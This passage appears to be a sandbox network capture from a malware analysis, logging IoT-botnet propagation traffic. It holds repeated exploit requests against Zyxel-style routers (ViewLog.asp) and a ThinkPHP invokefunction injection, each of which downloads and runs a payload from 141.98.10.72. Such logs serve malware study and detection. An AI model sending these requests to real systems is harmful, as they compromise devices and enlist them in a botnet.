                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:12.542346954 CET313INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 106
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      557192.168.2.153694295.86.93.38080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.343554020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      558192.168.2.155334485.158.57.258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.490931988 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:12.695894003 CET396INHTTP/1.0 401 Authentication Required
                                                      WWW-Authenticate: Basic realm="proxy"
                                                      Connection: close
                                                      Content-type: text/html; charset=us-ascii
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      559192.168.2.153504894.187.113.2188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.587404013 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      560192.168.2.153796462.29.96.1308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.591006994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      561192.168.2.154442694.123.127.1158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.591123104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      562192.168.2.155919895.168.78.380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.672889948 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:13.848824024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:15.256872892 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:18.264750957 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:23.896672010 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:35.161094904 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:57.687939882 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:42.742419004 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      563192.168.2.156085695.84.128.1548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.322788000 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.046566963 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.274210930 CET318INHTTP/1.0 401 Unauthorized
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                      WWW-Authenticate: Basic realm="MI-MINI"
                                                      Content-Type: text/html
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 34 3e 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>Authorization required.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      564192.168.2.154675894.253.13.1508080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.324790955 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:13.568994999 CET313INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 106
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      565192.168.2.155995485.208.121.588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.333249092 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:13.585273981 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.23
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:00:45 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3167
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      566192.168.2.155805231.13.207.288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.336677074 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      567192.168.2.155343831.136.94.218080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.774107933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.392828941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.608885050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:18.264744043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.128722906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:32.856318951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
